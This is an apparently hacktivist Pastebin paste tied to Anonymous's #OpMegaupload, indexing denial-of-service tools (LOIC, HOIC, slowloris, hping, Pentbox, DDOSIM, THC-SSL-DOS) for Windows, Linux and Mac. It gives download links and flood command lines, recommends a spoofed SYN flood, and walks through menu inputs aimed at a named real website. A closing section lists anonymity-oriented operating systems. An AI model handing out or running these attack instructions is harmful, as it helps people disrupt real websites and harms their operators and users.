Advertisement
Guest User

#Tutorials

a guest
Jan 21st, 2012
51,053
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.23 KB | None | 0 0
  1. #Anonymous #OpMegaupload #Setup #Tutorials
  2.  
  3. | W E A P O N S |
  4. v.0.1
  5.  
  6. n00b tutorial & toolz index
  7.  
  8.  
  9.  
  10. windows
  11. ---------------------------------------------------------------------------------------------------------
  12.  
  13. LOIC
  14. Download:
  15. https://github.com/NewEraCracker/LOIC/downloads
  16. Usage:
  17.  
  18. HOIC
  19. Download:
  20. http://hoic.99k.org
  21.  
  22. Pentbox
  23. http://www.pentbox.net/download-pentbox/
  24.  
  25.  
  26. Slowloris
  27. http://www.multiupload.nl/8KT494DULW
  28.  
  29. Usage:
  30. http://pastebin.com/5deha9Ug
  31.  
  32.  
  33. r-u-dead-yet?
  34. http://www.hybridsec.com/tools/rudy/
  35.  
  36.  
  37. hping2
  38. Download:
  39. http://www.hping.org/
  40. hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
  41. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  42.  
  43.  
  44.  
  45. for advanced users:
  46. http://www.thc.org/thc-ssl-dos/
  47.  
  48.  
  49.  
  50. linux
  51. ---------------------------------------------------------------------------------------------------------
  52.  
  53. Pentbox includes :
  54. TCP Flood DoSer
  55. TCP Flood AutoDoSer
  56. Spoofed SYN Flood DoSer [nmap - hping3] <-- best 4 our actions!
  57. Port scanner
  58. Honeypot
  59. PenTBox Secure Instant Messaging
  60. No Hivemode mode included, must fire manually.
  61.  
  62. Download:
  63. http://www.pentbox.net/download-pentbox/ <---
  64. use it as standalone or better with hping3 (see above)
  65.  
  66. startin terminal:
  67. sudo su
  68. cd pentbox
  69. ruby pentbox.rb
  70.  
  71. then type:
  72. 2
  73. 1
  74. 2
  75. input target example: leader.ir
  76. input target port : 80
  77. as default u use random sources but for beeing more effective use it with ur own packages.
  78.  
  79.  
  80. hping3
  81. Download:
  82. http://www.hping.org/hping3-20051105.tar.gz
  83.  
  84. Usage:
  85. hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
  86. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  87.  
  88.  
  89. slowloris
  90. http://ha.ckers.org/slowloris/
  91.  
  92. Download & Install:
  93. http://ha.ckers.org/slowloris/slowloris.pl
  94.  
  95. perl -MCPAN -e 'install IO::Socket::INET'
  96. perl -MCPAN -e 'install IO::Socket::SSL' | http://search.cpan.org/CPAN/authors/id/B/BE/BEHROOZI/IO-Socket-SSL-0.97.tar.gz
  97. perl -MCPAN -e ’install GetOpt::Long' | http://search.cpan.org/CPAN/authors/id/J/JV/JV/Getopt-Long-2.38.tar.gz
  98.  
  99. Usage:
  100. sudo su
  101. perl slowloris.pl
  102.  
  103. examples:
  104. http ddos ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
  105. https ddos ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
  106. 4 moar options take a look @ http://pastebin.com/uM1MjN4b
  107.  
  108.  
  109. loiq
  110. http://sourceforge.net/projects/loiq/files/
  111.  
  112.  
  113. pyloris
  114. ...can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.
  115.  
  116. Download:
  117. http://sourceforge.net/projects/pyloris/files/pyloris/3.2/pyloris-3.2.tgz/download
  118.  
  119.  
  120. pyloic (python loic)
  121.  
  122. Download:
  123. https://github.com/kenkeiras/pyLOIC/downloads
  124.  
  125. Usage:
  126.  
  127.  
  128. r-u-dead-yet?
  129. Download:
  130. http://www.hybridsec.com/tools/rudy/
  131.  
  132.  
  133. DDOSIM
  134. Info:
  135. http://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/
  136. Download:
  137. http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz/download
  138.  
  139. Usage:
  140. ./ddosim
  141. -d IP Target IP address
  142. -p PORT Target port
  143. [-k NET] Source IP from class C network (ex. 10.4.4.0)
  144. [-i IFNAME] Output interface name
  145. [-c COUNT] Number of connections to establish
  146. [-w DELAY] Delay (in milliseconds) between SYN packets
  147. [-r TYPE] Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
  148. [-t NRTHREADS] Number of threads to use when sending packets (default 1)
  149. [-n] Do not spoof source address (use local address)
  150. [-v] Verbose mode (slower)
  151. [-h] Print this help message
  152. Examples:
  153. 1. Establish 10 TCP connections from random IP addresses to www server and send invalid HTTP requests (similar to a DC++ based attack):
  154. ./ddosim -d 192.168.1.2 -p 80 -c 10 -r HTTP_INVALID -i eth0
  155. 2. Establish infinite connections from source network 10.4.4.0 to SMTP server and send EHLO requests:
  156. ./ddosim -d 192.168.1.2 -p 25 -k 10.4.4.0 -c 0 -r SMTP_EHLO -i eth0
  157. 3. Establish infinite connections at higher speed to www server and make HTTP valid requests:
  158. ./ddosim -d 192.168.1.2 -p 80 -c 0 -w 0 -t 10 -r HTTP_VALID -i eth0
  159. 4. Establish infinite TCP connections (without sending a Layer 7 request) from local address to a POP3 server:
  160. ./ddosim -d 192.168.1.2 -p 110 -c 0 -i eth0
  161.  
  162.  
  163.  
  164. for advanced users:
  165. http://www.thc.org/thc-ssl-dos/
  166.  
  167.  
  168.  
  169. MAC
  170. ---------------------------------------------------------------------------------------------------------
  171. ZAP
  172. http://www.cowfight.com/cf4/zapattack/
  173. http://www.cowfight.com/cf4/zapattack/
  174.  
  175.  
  176. Pentbox
  177. http://www.pentbox.net/download-pentbox/
  178.  
  179.  
  180. HowTo use LOIC (or others) on a MAC using MONO:
  181. https://github.com/NewEraCracker/LOIC/wiki/How-to-run-LOIC-using-Mono
  182.  
  183.  
  184.  
  185.  
  186. Operation Systems
  187. ---------------------------------------------------------------------------------------------------------
  188. http://insurgen.cc/index.php?title=L/i/nux
  189. http://insurgen.cc/index.php?title=W/i/ndows
  190.  
  191.  
  192. AnonOS
  193. http://operationcelebration.net/wiki/AnonOS
  194.  
  195.  
  196. Annonaceae v.0.0.3 MELCHISEDEK (PROJECT BASIS.) http://www.filefactory.com/file/b513ah8/n/annonaceae.iso
  197.  
  198.  
  199. AnonOS (Strictly Defensive)
  200. Rebulding is planned! v0.1 (initial!) http://piratenpad.de/AnonOS-v0-1 Documentation: http://piratepad.net/3540VLXFg7
  201.  
  202.  
  203. Cherimoya Internet Security LiveCD (for raids)
  204. v.0.0.1 MELCHISEDEK (Merged from another project) http://ge.tt/3nrRkBf Documentation: http://piratepad.net/3540VLXFg7
  205.  
  206.  
  207. TAILS
  208. https://amnesia.boum.org/
  209. Download:
  210. http://dl.amnesia.boum.org/tails/stable/
  211.  
  212.  
  213. AnonymOS
  214. http://sourceforge.net/projects/anonym-os/files/Anonym.OS%20Live%20CD/ShmooCon%202006/anonymos-shmoo.iso/download
  215.  
  216.  
  217. Liberte Linux - persistent,portable USB OS 4 anon communikation
  218. http://dee.su/liberte
  219.  
  220. Download:
  221. http://sourceforge.net/projects/liberte/files/2010.1/liberte-2010.1.zip/download
  222.  
  223.  
  224. Privatix - persistent,portable USB OS 4 privacy & encryption
  225. http://download.kommunikationssystem.de/privatix_10.02.07_de.iso
  226.  
  227.  
  228. to make linux distros portable use http://unetbootin.sourceforge.net/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement